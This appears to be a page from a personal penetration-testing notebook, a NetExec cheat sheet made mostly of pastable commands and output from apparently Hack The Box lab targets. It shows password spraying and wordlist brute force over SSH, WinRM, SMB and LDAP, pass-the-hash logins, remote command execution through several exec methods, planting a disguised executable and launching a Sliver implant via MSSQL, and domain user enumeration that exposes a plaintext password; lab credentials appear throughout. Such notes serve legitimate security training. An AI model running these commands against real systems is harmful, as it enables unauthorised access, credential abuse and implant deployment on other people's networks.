Hacknetics
  • Hacknetics
  • Active Directory Management
    • How to Join a Windows 11 PC to a Domain
    • Allow RDP in the domain
  • Active Directory AD Attacks
    • Bloodhound
      • Bloodhound Cypher Queries
    • Impacket-install
    • Kerberos cheatsheet
    • Domain Controllers
    • Overpass The Hash/Pass The Key (PTK)
    • Bloodhound Python
    • Rubeus to Ccache
    • Silver Ticket
    • Golden Ticket
    • Abusing GPO Permissions
    • AppLocker Bypasses
    • SharpView Enumeration
    • DonPapi
    • AD Overview
    • Enumerating Forests
    • NOPAC Priv esc
  • buffer-overflows
    • Buffer Overflows
  • c2-frameworks
    • Sliver
    • Powershell Empire
      • IronPython Empire
    • Metasploit
      • Metasploit Basics
      • Custom MSF Resource Scripts
      • Meterpreter Device Survey
      • Paranoid Mode
    • Pwncat-cs
    • Cobalt Strike
    • Dcrat
      • Modules
      • Builder
      • Dcrat AV Evasion
      • C2 Comms
    • FFM Documentation
  • covering-tracks
    • Evading Logging and Monitoring
    • Linux Logging
    • Tor
    • Windows Log Clearing
    • Ghost Writing Binaries
    • Backdoor Linux Commands
  • Data Exfiltration
  • Exploit Development
    • ROP Finding the vulnerable function
    • Useful Tools for Exploit Dev
    • ropeme
    • Obtaining MSFT Patches for Analysis
    • Mutiny Fuzzer
    • GDB
  • file-transfers
    • Transfering Files
  • lateral-movement
    • Pivoting Enumeration
      • Proxychains and FoxyProxy
      • SSH Tunneling and Port Forwarding
      • Plink.exe
      • socat
      • Chisel
      • SShuttle
  • lin-priv-esc
    • Linux Privilege Escalation
    • Bash Jails
    • ssh agent
  • Things I have Pwn'd before
    • Tomcat
    • Jenkins
  • persistence
    • Linux Persistence
    • Windows Persistence
      • Assign Group Memberships
      • Guest Windows Account Persistence
      • WMI Persist With Event Filters
      • SAM SYSTEM Exfil / Pass The Hash
      • Backdoor Executable
      • Special Privileges and Security Descriptors
      • RID Hijacking
      • Task Scheduler
      • Hijacking File Associations
      • Abusing Services
      • Logon Triggered Persistence
      • MSSQL Enabling xp cmdshell
      • Sticky Keys
      • Using Web Shells
  • recon-enumeration
    • Exploit Research
    • Pentesting DNS
    • Pentesting Kerberos
    • Pentesting FTP
    • Pentesting Email
    • Pentesting SMB
    • Pentesting Redis
    • Banner Grabbing
    • Pentesting Rsync
    • Pentesting MsSql
    • Scanning
    • Pentesting SNMP
    • Pentesting NFS
    • Pentesting LDAP
    • Pentesting Finger
    • User Recon
  • resources
    • resources
    • Youtube / Book List
    • CS/Software Engineer Resources
  • shells
    • Shells
    • web-shells
      • PHP Reverse Shell
      • wwwolf's PHP web shell
  • tool-guides
    • Asymmetric File Encrypt and Decrypt
    • Aws Buckets
    • cewl-crunch
    • Creating a Custom Wordlist
    • evil-winrm
    • Git
    • gobuster
    • Hashcat
    • Hydra User Guide
    • John
    • Linux Basics
    • Mimikatz
    • netcat
    • Nmap
    • nuclei
    • PowerView
    • r2
    • Resources
    • tcpdump
    • T-Shark User Guide
    • tmux
    • ssh
    • Vim
    • Wireshark
    • kwp
    • LAPS
    • KeePass KeeThief
    • FileCryptography.psm1
    • Impacket Pastable Commands
    • crackmapexec Pastable Commands
    • feroxbuster
    • NetExec
    • Ligolo-ng
    • gs-netcat
    • Scarecrow
  • Web Path
    • Testing for LFI
    • Testing for RFI
    • Testing for SQL
    • Testing for XSS
    • Authentication Bypass
    • Cmd Injection
    • Javascript Vulnerabilities
    • SSTI
    • Web Servers
    • JWT Tokens
    • Adobe Coldfusion
    • NoSQL Injection
    • vhost Enumeration
  • Wifi/Bluetooth/ZigBee/SDR/SmartCards
    • Wifi Capture Filters
    • Bluetooth Basics
    • Wifi Overview
    • Bettercap Bluetooth / Wifi
    • Aircrack-ng
    • Airdecap-ng
    • Aireplay-ng
    • RTL-SDR Radio
    • Bluetooth Low Energy
    • Smart Cards
    • Airodump-ng Airgraph-ng
    • gqrx
  • Windows
    • powershell-cheatsheet
    • Windows Privlage Escalation
    • Anti-Virus Evasion
    • Windows Registry
    • exploits
      • printspoofer
    • Windows Kernel Vulnerabilities
    • Windows Defender
    • AMSI Bypasses
    • pktmon Packet Capture Windows
    • Powershell Constrained Language Mode
    • Windows Survey
    • Windows Persistence
    • Windows World Writeable Dirs
  • firewalls
    • iptables
    • ufw
    • netsh advfirewall
  • Malware Analysis
    • Malware Analysis Fundamentals
    • Packer Identification by File section names
    • Analyzing Malicious Documents
    • In Depth Malware Analysis
    • Reversing Malicious Code
  • Infrastructure Development
    • SSL Cert Generation
    • Pfsense
      • OpenVPN Server on Pfsense
    • Proxmox OVA Import
  • Python3 Reference
    • Python3 Cheatsheet
    • Regex Python3
  • EDR
    • Velociraptor EDR
  • Host Forensics
    • Windows Host Forensics
    • Windows NT Versions
    • Windows Logs
  • Cloud
    • AWS
  • OSINT
    • Spiderfoot
    • Shodan Dorks
  • Phishing
  • Random
  • Linux
    • awk
    • cut
    • grep
    • sort
    • Cups CVE2024
  • Windows Malware Development
    • Win32 API
    • Processes Threads Handles
      • Message Box Example (Basic)
      • CreateProcess Example (Basic)
  • Golang
  • Mikrotik
    • Implementing a Password Reset Function for Persistent Access in MikroTik RouterOS
    • Cleaner Wrasse
  • Firmware Reversing
Powered by GitBook
On this page
  • SSH
  • WINRM
  • SMB
  • MSSQL
  • Put file
  • LDAP
  • Execution of Commands
  • mmcexec Execution
  • atexec Scheduled task execution
  • smbexec command execution
  • wmiexec command execution

Was this helpful?

Edit on GitHub
  1. tool-guides

NetExec

SSH

  • attempt ssh authentication to multiple hosts with one set of credentials 

./nxc ssh targets.txt -u james -p password123
./nxc ssh targets.txt -u balthazar -p 'password123'
./nxc ssh targets.txt -u root -p asdfghjkl

  • attempt ssh auth to any host in a subnet with one set of credentials 

./nxc ssh 172.16.1.0/24 -u james -p password123

WINRM

  • attempt winrm authentication to multiple hosts with one set of credentials 

./nxc winrm targets.txt -u balthazar -p 'abc123!!!'
# domain authentication
./nxc winrm targets.txt -u 'HTB.local\balthazar' -p 'abc123!!!' 
./nxc winrm targets.txt -u 'HTB.local\james' -p password123

  • attempt winrm authentication to a domain with a username and hash

./nxc winrm targets.txt -d HTB.local -u blake -H 12f18eteb6f8187fa52f3f729896bbb7
./nxc winrm targets.txt -u Administrator -H b99ed3c3d34c4576bcd33c76420be934

  • winrm with a single username and a password wordlist

./nxc winrm 172.16.1.101 -u dan.hard -p 172.16.1.101/passwordlist.txt

SMB

  • attempt smb authentication to multiple hosts with one set of credentials 

./nxc smb targets.txt -u 'HTB.local\james' -p password123

  • attempt ssh authentication with a keyfile instead of a password

./nxc ssh 172.16.1.0/24 -u root --key-file ./10.10.110.100/ssh/id_rsa -p ''

  • attempt smb auth to any host in a subnet with anonymous logon 

./nxc smb 172.16.1.0/24 -u anonymous -p ''

  • smb authentication to a domain with a specific username and attempt a password wordlist

./nxc smb 172.16.1.13 -d DANTE.local -u 'gerald' -p /usr/share/seclists/Passwords/2020-200_most_used_passwords.txt

  • attempt to authenticate with a known/potential password against a username list

./nxc smb 10.10.11.35 -d cicada.htb -u ~/Documents/htb/cicada/loot/users.txt -p 'Cicada$M6Corpb*@Lp#nZp!8' 
SMB         10.10.11.35     445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.35     445    CICADA-DC        [-] CICADA\Administrator:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE 
SMB         10.10.11.35     445    CICADA-DC        [-] CICADA\Guest:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE 
SMB         10.10.11.35     445    CICADA-DC        [-] CICADA\krbtgt:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE 
SMB         10.10.11.35     445    CICADA-DC        [-] CICADA\CICADA-DC$:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE 
SMB         10.10.11.35     445    CICADA-DC        [-] CICADA\john.smoulder:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE 
SMB         10.10.11.35     445    CICADA-DC        [-] CICADA\sarah.dantelia:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE 
SMB         10.10.11.35     445    CICADA-DC        [+] CICADA\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8

MSSQL

  • Access MSSQL and run a command with a password 

./nxc mssql 172.16.1.5 -u sophie -p thisisagoodpassword-X whoami --local-auth
MSSQL       172.16.1.5      1433   DANTE-SQL01      [*] Windows 10.0 Build 14393 (name:DANTE-SQL01) (domain:DANTE-SQL01)
MSSQL       172.16.1.5      1433   DANTE-SQL01      [+] sophie:thisisagoodpassword(Pwn3d!)
MSSQL       172.16.1.5      1433   DANTE-SQL01      [+] Executed command via mssqlexec
MSSQL       172.16.1.5      1433   DANTE-SQL01      nt service\mssql$sqlexpress

  • kick off a sliver implant in the background 

./nxc mssql 172.16.1.5 -u sophie -p thisisagoodpassword-X 'cmd.exe /c start /b C:\Windows\System32\spool\drivers\color\security.exe' --local-auth
[*] Session b00d3dc6 dante-dc01 - 10.10.14.3:33086 (DANTE-SQL01) - windows/amd64 - Sun, 19 May 2024 13:48:24 EDT

Put file

./nxc smb 172.16.1.13 -u Administrator -H aad3b435b51404eeaad3b435b51404ee:d0629f5539666892bf9ba9b34daa125c --put-file /opt/wmiexec2/RuntimeBroker.exe \\xampp\\apache\\bin\\iconv\\RuntimeBroker.exe

./nxc mssql 172.16.1.5 -u sophie -p thisisapassword --put-file /home/ubuntu/Documents/htb/dante/security.exe 'C:\Windows\System32\spool\drivers\color\security.exe' --local-auth

LDAP

  • attempt authentication to ldap with a username list and a valid password

./nxc ldap 10.10.11.35 -d cicada.htb -u ~/Documents/htb/cicada/loot/users.txt -p 'Cicada$M6Corpb*@Lp#nZp!8'

  • list of users and computers with flag TRUSTED_FOR_DELEGATION

./nxc ldap 10.10.11.35 -d cicada.htb -u 'CICADA\michael.wrightson' -p 'Cicada$M6Corpb*@Lp#nZp!8' --trusted-for-delegation
SMB         10.10.11.35     445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
LDAP        10.10.11.35     389    CICADA-DC        [+] CICADA\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8 
LDAP        10.10.11.35     389    CICADA-DC        CICADA-DC$

  • get admin count and their usernames 

./nxc ldap 10.10.11.35 -d cicada.htb -u 'CICADA\michael.wrightson' -p 'Cicada$M6Corpb*@Lp#nZp!8' --admin-count           
SMB         10.10.11.35     445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
LDAP        10.10.11.35     389    CICADA-DC        [+] CICADA\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8 
LDAP        10.10.11.35     389    CICADA-DC        Administrator
LDAP        10.10.11.35     389    CICADA-DC        Administrators
LDAP        10.10.11.35     389    CICADA-DC        Print Operators
LDAP        10.10.11.35     389    CICADA-DC        Backup Operators
LDAP        10.10.11.35     389    CICADA-DC        Replicator
LDAP        10.10.11.35     389    CICADA-DC        krbtgt
LDAP        10.10.11.35     389    CICADA-DC        Domain Controllers
LDAP        10.10.11.35     389    CICADA-DC        Schema Admins
LDAP        10.10.11.35     389    CICADA-DC        Enterprise Admins
LDAP        10.10.11.35     389    CICADA-DC        Domain Admins
LDAP        10.10.11.35     389    CICADA-DC        Server Operators
LDAP        10.10.11.35     389    CICADA-DC        Account Operators
LDAP        10.10.11.35     389    CICADA-DC        Read-only Domain Controllers
LDAP        10.10.11.35     389    CICADA-DC        Key Admins
LDAP        10.10.11.35     389    CICADA-DC        Enterprise Key Admins
LDAP        10.10.11.35     389    CICADA-DC        Dev Support
LDAP        10.10.11.35     389    CICADA-DC        emily.oscars

  • get users on the box, passwords can be in the comment field 

./nxc ldap 10.10.11.35 -d cicada.htb -u 'CICADA\michael.wrightson' -p 'Cicada$M6Corpb*@Lp#nZp!8' --users
SMB         10.10.11.35     445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
LDAP        10.10.11.35     389    CICADA-DC        [+] CICADA\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8 
LDAP        10.10.11.35     389    CICADA-DC        [*] Enumerated 8 domain users: CICADA
LDAP        10.10.11.35     389    CICADA-DC        -Username-                    -Last PW Set-       -BadPW- -Description-      
LDAP        10.10.11.35     389    CICADA-DC        Administrator                 2024-08-26 20:08:03 2       Built-in account for administering the computer/domain
LDAP        10.10.11.35     389    CICADA-DC        Guest                         2024-08-28 17:26:56 2       Built-in account for guest access to the computer/domain
LDAP        10.10.11.35     389    CICADA-DC        krbtgt                        2024-03-14 11:14:10 3       Key Distribution Center Service Account
LDAP        10.10.11.35     389    CICADA-DC        john.smoulder                 2024-03-14 12:17:29 2                          
LDAP        10.10.11.35     389    CICADA-DC        sarah.dantelia                2024-03-14 12:17:29 2                          
LDAP        10.10.11.35     389    CICADA-DC        michael.wrightson             2024-03-14 12:17:29 0                          
LDAP        10.10.11.35     389    CICADA-DC        david.orelious                2024-03-14 12:17:29 0       Just in case I forget my password is aRt$Lp#7t*VQ!3
LDAP        10.10.11.35     389    CICADA-DC        emily.oscars                  2024-08-22 21:20:17 0

  • get groups on the machine via ldap 

./nxc ldap 10.10.11.35 -d cicada.htb -u 'CICADA\michael.wrightson' -p 'Cicada$M6Corpb*@Lp#nZp!8' --groups
SMB         10.10.11.35     445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
LDAP        10.10.11.35     389    CICADA-DC        [+] CICADA\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8 
LDAP        10.10.11.35     389    CICADA-DC        Administrators
LDAP        10.10.11.35     389    CICADA-DC        Users
LDAP        10.10.11.35     389    CICADA-DC        Guests
LDAP        10.10.11.35     389    CICADA-DC        Print Operators
LDAP        10.10.11.35     389    CICADA-DC        Backup Operators
LDAP        10.10.11.35     389    CICADA-DC        Replicator
LDAP        10.10.11.35     389    CICADA-DC        Remote Desktop Users
LDAP        10.10.11.35     389    CICADA-DC        Network Configuration Operators
LDAP        10.10.11.35     389    CICADA-DC        Performance Monitor Users
LDAP        10.10.11.35     389    CICADA-DC        Performance Log Users
LDAP        10.10.11.35     389    CICADA-DC        Distributed COM Users
LDAP        10.10.11.35     389    CICADA-DC        IIS_IUSRS
LDAP        10.10.11.35     389    CICADA-DC        Cryptographic Operators
LDAP        10.10.11.35     389    CICADA-DC        Event Log Readers
LDAP        10.10.11.35     389    CICADA-DC        Certificate Service DCOM Access
LDAP        10.10.11.35     389    CICADA-DC        RDS Remote Access Servers
LDAP        10.10.11.35     389    CICADA-DC        RDS Endpoint Servers
LDAP        10.10.11.35     389    CICADA-DC        RDS Management Servers
LDAP        10.10.11.35     389    CICADA-DC        Hyper-V Administrators
LDAP        10.10.11.35     389    CICADA-DC        Access Control Assistance Operators
LDAP        10.10.11.35     389    CICADA-DC        Remote Management Users
--snip--

  • enumerate domain controllers

./nxc ldap 10.10.11.35 -d cicada.htb -u 'CICADA\michael.wrightson' -p 'Cicada$M6Corpb*@Lp#nZp!8' --dc-list

  • get active users (non expired) via ldap 

./nxc ldap 10.10.11.35 -d cicada.htb -u 'CICADA\michael.wrightson' -p 'Cicada$M6Corpb*@Lp#nZp!8' --active-users
SMB         10.10.11.35     445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
LDAP        10.10.11.35     389    CICADA-DC        [+] CICADA\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8 
LDAP        10.10.11.35     389    CICADA-DC        [*] Total records returned: 7, total 1 user(s) disabled
LDAP        10.10.11.35     389    CICADA-DC        -Username-                    -Last PW Set-       -BadPW- -Description-      
LDAP        10.10.11.35     389    CICADA-DC        Administrator                 2024-08-26 20:08:03 2       Built-in account for administering the computer/domain
LDAP        10.10.11.35     389    CICADA-DC        Guest                         2024-08-28 17:26:56 2       Built-in account for guest access to the computer/domain
LDAP        10.10.11.35     389    CICADA-DC        john.smoulder                 2024-03-14 12:17:29 2                          
LDAP        10.10.11.35     389    CICADA-DC        sarah.dantelia                2024-03-14 12:17:29 2                          
LDAP        10.10.11.35     389    CICADA-DC        michael.wrightson             2024-03-14 12:17:29 0                          
LDAP        10.10.11.35     389    CICADA-DC        david.orelious                2024-03-14 12:17:29 0       Just in case I forget my password is aRt$Lp#7t*VQ!3
LDAP        10.10.11.35     389    CICADA-DC        emily.oscars                  2024-08-22 21:20:17 0

  • get bloodhound scan via ldap remote with net-exec

./nxc ldap 10.10.11.35 -d cicada.htb --dns-server 10.10.11.35 -u 'CICADA\michael.wrightson' -p 'Cicada$M6Corpb*@Lp#nZp!8' --bloodhound

Execution of Commands

  • execute cmd.exe command

./nxc smb 10.10.11.35 -d cicada.htb -u 'CICADA\emily.oscars' -p 'Q!3@Lp#M6b*7t*Vt' -x whoami

  • execute powershell command 

./nxc smb 10.10.11.35 -d cicada.htb -u 'CICADA\emily.oscars' -p 'Q!3@Lp#M6b*7t*Vt' -X whoami

mmcexec Execution

  • cmd.exe and powershell.exe

./nxc smb 10.10.11.35 -d cicada.htb -u 'CICADA\emily.oscars' -p 'Q!3@Lp#M6b*7t*Vt' --exec-method mmcexec -x whoami
./nxc smb 10.10.11.35 -d cicada.htb -u 'CICADA\emily.oscars' -p 'Q!3@Lp#M6b*7t*Vt' --exec-method mmcexec -X whoami

atexec Scheduled task execution

  • cmd.exe and powershell.exe

./nxc smb 10.10.11.35 -d cicada.htb -u 'CICADA\emily.oscars' -p 'Q!3@Lp#M6b*7t*Vt' --exec-method atexec -x dir
./nxc smb 10.10.11.35 -d cicada.htb -u 'CICADA\emily.oscars' -p 'Q!3@Lp#M6b*7t*Vt' --exec-method atexec -X dir

smbexec command execution

  • cmd.exe and powershell.exe

./nxc smb 10.10.11.35 -d cicada.htb -u 'CICADA\emily.oscars' -p 'Q!3@Lp#M6b*7t*Vt' --exec-method smbexec -x dir
./nxc smb 10.10.11.35 -d cicada.htb -u 'CICADA\emily.oscars' -p 'Q!3@Lp#M6b*7t*Vt' --exec-method smbexec -X dir

wmiexec command execution

  • cmd.exe and powershell.exe

./nxc smb 10.10.11.35 -d cicada.htb -u 'CICADA\emily.oscars' -p 'Q!3@Lp#M6b*7t*Vt' --exec-method wmiexec -x dir
./nxc smb 10.10.11.35 -d cicada.htb -u 'CICADA\emily.oscars' -p 'Q!3@Lp#M6b*7t*Vt' --exec-method wmiexec -X dir
PreviousferoxbusterNextLigolo-ng

Last updated 6 months ago

Was this helpful?